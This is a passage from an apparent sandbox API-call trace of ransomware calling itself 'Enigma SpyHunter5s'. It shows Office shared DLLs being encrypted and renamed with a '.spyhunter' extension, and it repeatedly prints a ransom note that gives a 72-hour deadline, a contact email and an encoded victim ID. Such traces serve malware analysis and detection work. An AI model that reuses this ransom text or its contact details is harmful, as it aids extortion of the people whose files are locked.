Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0178.505] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\OPHPROXY.DLL.spyhunter") returned 88 [0178.505] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\OPHPROXY.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\ophproxy.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\OPHPROXY.DLL.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\ophproxy.dll.spyhunter")) returned 1 [0178.507] GetProcessHeap () returned 0x2c0000 [0178.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0178.507] GetProcessHeap () returned 0x2c0000 [0178.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0178.507] GetProcessHeap () returned 0x2c0000 [0178.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee8f98 | out: hHeap=0x2c0000) returned 1 [0178.507] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e3f8 | out: pbBuffer=0x248e3f8) returned 1 [0178.507] GetProcessHeap () returned 0x2c0000 [0178.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0178.507] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e3f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e3f0*=0x30) returned 1 [0178.507] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\MSO.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\mso.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0178.509] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\MSO.DLL") returned 73 [0178.509] StrStrW (lpFirst="MSO.DLL", lpSrch=".txt") returned 0x0 [0178.509] GetProcessHeap () returned 0x2c0000 [0178.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0178.509] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e3b4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e3b4*=0x2800, lpOverlapped=0x0) returned 1 [0178.580] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0178.580] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e3b4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e3b4*=0x2800, lpOverlapped=0x0) returned 1 [0178.580] GetProcessHeap () returned 0x2c0000 [0178.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0178.581] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.581] WriteFile (in: hFile=0xa0, lpBuffer=0x248e3f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e3b4, lpOverlapped=0x0 | out: lpBuffer=0x248e3f4*, lpNumberOfBytesWritten=0x248e3b4*=0x4, lpOverlapped=0x0) returned 1 [0178.686] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e3b4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e3b4*=0x30, lpOverlapped=0x0) returned 1 [0178.686] CloseHandle (hObject=0xa0) returned 1 [0178.686] GetProcessHeap () returned 0x2c0000 [0178.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0178.686] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\MSO.DLL.spyhunter") returned 83 [0178.686] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\MSO.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\mso.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\MSO.DLL.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\mso.dll.spyhunter")) returned 1 [0178.687] GetProcessHeap () returned 0x2c0000 [0178.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0178.688] GetProcessHeap () returned 0x2c0000 [0178.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0178.688] GetProcessHeap () returned 0x2c0000 [0178.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee42b0 | out: hHeap=0x2c0000) returned 1 [0178.688] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\1033\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0178.846] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0178.846] WriteFile (in: hFile=0xa0, lpBuffer=0x248e327*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e450, lpOverlapped=0x0 | out: lpBuffer=0x248e327*, lpNumberOfBytesWritten=0x248e450*=0x127, lpOverlapped=0x0) returned 1 [0178.846] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0178.846] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e450, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e450*=0x2ac, lpOverlapped=0x0) returned 1 [0178.847] CloseHandle (hObject=0xa0) returned 1 [0178.847] GetProcessHeap () returned 0x2c0000 [0178.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e4b7b0 | out: hHeap=0x2c0000) returned 1 [0178.847] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e3f0 | out: pbBuffer=0x248e3f0) returned 1 [0178.847] GetProcessHeap () returned 0x2c0000 [0178.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0178.847] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e3e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e3e8*=0x30) returned 1 [0178.847] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0178.848] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 90 [0178.848] StrStrW (lpFirst="MSOINTL.DLL.IDX_DLL", lpSrch=".txt") returned 0x0 [0178.848] GetProcessHeap () returned 0x2c0000 [0178.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0178.848] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e3ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e3ac*=0x2800, lpOverlapped=0x0) returned 1 [0178.946] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0178.947] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e3ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e3ac*=0x2800, lpOverlapped=0x0) returned 1 [0178.947] GetProcessHeap () returned 0x2c0000 [0178.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0178.947] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.948] WriteFile (in: hFile=0xa0, lpBuffer=0x248e3ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e3ac, lpOverlapped=0x0 | out: lpBuffer=0x248e3ec*, lpNumberOfBytesWritten=0x248e3ac*=0x4, lpOverlapped=0x0) returned 1 [0179.041] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e3ac, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e3ac*=0x30, lpOverlapped=0x0) returned 1 [0179.041] CloseHandle (hObject=0xa0) returned 1 [0179.041] GetProcessHeap () returned 0x2c0000 [0179.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0179.041] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL.spyhunter") returned 100 [0179.042] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll.spyhunter")) returned 1 [0179.042] GetProcessHeap () returned 0x2c0000 [0179.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0179.042] GetProcessHeap () returned 0x2c0000 [0179.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.042] GetProcessHeap () returned 0x2c0000 [0179.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5d3c0 | out: hHeap=0x2c0000) returned 1 [0179.043] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1049\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.043] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.043] WriteFile (in: hFile=0xa0, lpBuffer=0x248e31f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e448, lpOverlapped=0x0 | out: lpBuffer=0x248e31f*, lpNumberOfBytesWritten=0x248e448*=0x127, lpOverlapped=0x0) returned 1 [0179.044] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.044] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e448, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e448*=0x2ac, lpOverlapped=0x0) returned 1 [0179.044] CloseHandle (hObject=0xa0) returned 1 [0179.044] GetProcessHeap () returned 0x2c0000 [0179.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x2c0000) returned 1 [0179.044] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e3e8 | out: pbBuffer=0x248e3e8) returned 1 [0179.044] GetProcessHeap () returned 0x2c0000 [0179.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.044] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e3e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e3e0*=0x30) returned 1 [0179.044] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1049\\hxdsui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.045] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\hxdsui.dll") returned 77 [0179.045] StrStrW (lpFirst="hxdsui.dll", lpSrch=".txt") returned 0x0 [0179.045] GetProcessHeap () returned 0x2c0000 [0179.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0179.045] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e3a4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248e3a4*=0x2800, lpOverlapped=0x0) returned 1 [0179.087] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.087] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e3a4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248e3a4*=0x2800, lpOverlapped=0x0) returned 1 [0179.087] GetProcessHeap () returned 0x2c0000 [0179.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0179.087] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.087] WriteFile (in: hFile=0xa0, lpBuffer=0x248e3e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e3a4, lpOverlapped=0x0 | out: lpBuffer=0x248e3e4*, lpNumberOfBytesWritten=0x248e3a4*=0x4, lpOverlapped=0x0) returned 1 [0179.103] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e3a4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e3a4*=0x30, lpOverlapped=0x0) returned 1 [0179.103] CloseHandle (hObject=0xa0) returned 1 [0179.103] GetProcessHeap () returned 0x2c0000 [0179.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0179.103] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\hxdsui.dll.spyhunter") returned 87 [0179.103] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1049\\hxdsui.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\hxdsui.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1049\\hxdsui.dll.spyhunter")) returned 1 [0179.104] GetProcessHeap () returned 0x2c0000 [0179.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0179.105] GetProcessHeap () returned 0x2c0000 [0179.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.105] GetProcessHeap () returned 0x2c0000 [0179.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee83d0 | out: hHeap=0x2c0000) returned 1 [0179.105] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1046\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.106] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.106] WriteFile (in: hFile=0xa0, lpBuffer=0x248e317*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e440, lpOverlapped=0x0 | out: lpBuffer=0x248e317*, lpNumberOfBytesWritten=0x248e440*=0x127, lpOverlapped=0x0) returned 1 [0179.107] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.107] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e440, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e440*=0x2ac, lpOverlapped=0x0) returned 1 [0179.107] CloseHandle (hObject=0xa0) returned 1 [0179.107] GetProcessHeap () returned 0x2c0000 [0179.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7fb80 | out: hHeap=0x2c0000) returned 1 [0179.107] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e3e0 | out: pbBuffer=0x248e3e0) returned 1 [0179.107] GetProcessHeap () returned 0x2c0000 [0179.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.108] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e3d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e3d8*=0x30) returned 1 [0179.108] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1046\\hxdsui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.109] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\hxdsui.dll") returned 77 [0179.109] StrStrW (lpFirst="hxdsui.dll", lpSrch=".txt") returned 0x0 [0179.109] GetProcessHeap () returned 0x2c0000 [0179.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0179.109] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e39c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248e39c*=0x2800, lpOverlapped=0x0) returned 1 [0179.138] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.138] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e39c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248e39c*=0x2800, lpOverlapped=0x0) returned 1 [0179.138] GetProcessHeap () returned 0x2c0000 [0179.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0179.138] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.138] WriteFile (in: hFile=0xa0, lpBuffer=0x248e3dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e39c, lpOverlapped=0x0 | out: lpBuffer=0x248e3dc*, lpNumberOfBytesWritten=0x248e39c*=0x4, lpOverlapped=0x0) returned 1 [0179.229] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e39c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e39c*=0x30, lpOverlapped=0x0) returned 1 [0179.229] CloseHandle (hObject=0xa0) returned 1 [0179.229] GetProcessHeap () returned 0x2c0000 [0179.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0179.229] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\hxdsui.dll.spyhunter") returned 87 [0179.229] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1046\\hxdsui.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\hxdsui.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1046\\hxdsui.dll.spyhunter")) returned 1 [0179.230] GetProcessHeap () returned 0x2c0000 [0179.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0179.230] GetProcessHeap () returned 0x2c0000 [0179.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.230] GetProcessHeap () returned 0x2c0000 [0179.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee82e8 | out: hHeap=0x2c0000) returned 1 [0179.230] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1041\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.231] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") 